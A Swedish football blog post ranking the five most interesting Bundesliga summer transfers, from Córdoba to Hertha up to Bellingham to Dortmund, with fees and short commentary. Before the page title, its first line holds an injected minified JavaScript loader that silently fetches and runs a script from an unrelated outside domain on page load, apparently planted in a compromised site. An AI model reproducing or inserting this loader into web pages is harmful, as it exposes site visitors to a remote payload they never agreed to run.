;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tysktisdag – Topp 5 övergångar – FMSweden
Meny Stäng

Tysktisdag – Topp 5 övergångar

Keven Tysk-tisdag

De tyska klubbarna bjöd inte på några stora summor när de värvade i sommarens transferfönster, trots det fick vi se ett par fina övergångar. Jag kommer härmed lista de fem intressantaste värvningarna som BL-klubbarna gjorde, enligt mig:

Jag har utgått ifrån prislappen, kvalitén,  potentialen och lagets behov.

PLATS 5: Jhon Córdoba från FC Köln till Hertha Berlin 15 miljoner €

  • Med Córdoba har Hertha fått en giftig anfallare. På sina inledande två ligamatcher har 27-åringen redan nätat två gånger och det lär bli en del till denna säsong. Det är ingen anfallare som slåss om att vinna den europeiska guldskon, men han är nog precis det som Hertha Berlin behöver i sitt bygge.

 

PLATS4: Maxence Lacroix från Sochaux till Wolfsburg 5 miljoner €

  • Det är nog inte så många som känner till Maxence Lacroix. 20-åringen har knappt två säsonger i bagaget på A-lagsfronten innan han nu anlände till Wolfsburg. Jag tycker att han ser lovande ut och har redan på sin korta tid gjort ett avtryck. Han blev bland annat uttagen i Kickers “Omgångens elva” redan efter omgång 1. Håll ett extra öga på Lacroix – kanske även något för dig i ditt FM-bygge. Prisvärd, ung lovande försvarare – wunderbar.

 

PLATS 3: Alexander Sörloth från Crystal Palace till RB Leipzig 20 miljoner €

  • När Timo Werner blev klar för Chelsea var RB Leipzig tvungna att plocka in en ersättare. Förutom att man värvade anfallaren Hwang från Red Bull Salzburg lyckades man få in anfallaren som man hade högst upp på önskelistan, Alexander Sörloth. Norrmannen hade ingen vidare tid i Crystal Palace, men under sin säsong i Trabzonspor visade han vad han går för: 33 mål och 11 assist på 44 matcher. Det blir svårt att fylla Werners skor, men Sörloth har alla förutsättningar att lyckas i ett välmående RB Leipzig.

 

PLATS 2: Leroy Sané från Manchester City till Bayern München 45 miljoner €

  • Ingen större överraskning att en tysk landslagsspelare kommer så högt upp på listan. Förutom att Bayern München med Sané får en av Tysklands mest lovande offensiva spelare så fick de honom för ett väldigt bra pris. Förra sommaren pratades det om en prislapp på cirka 100 miljoner €. På grund av korsbandsskadan som han drog på sig och kontraktssituationen lyckades Bayern München pressa ner priset till 45 miljoner €, mindre än vad City köpte honom för (52 miljoner €).

 

PLATS 1: Jude Bellingham från Birmingham City till Dortmund 23 miljoner €

  • De flesta toppklubbarna i Europa var efter den unge engelska supertalangen, men slutligen drog Dortmund, återigen, det längsta strået. Med blott 17 år har han redan visat vad han går för. Inför säsongen trodde jag att han skulle skolas långsamt och försiktigt in i laget, men så blev inte fallet. Han har spelat från start i de första tre ligaomgångarna och gjort ett oerhört bra jobb. I den första matchen stod han dessutom för en assist. Vilken diamant Dortmund har värvat – kommer bli oerhört intressant att följa hans utveckling.

*Priserna är tagna från Transfermarkt.

 

Vad tycker du – vilka värvningar tycker du mest om?

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar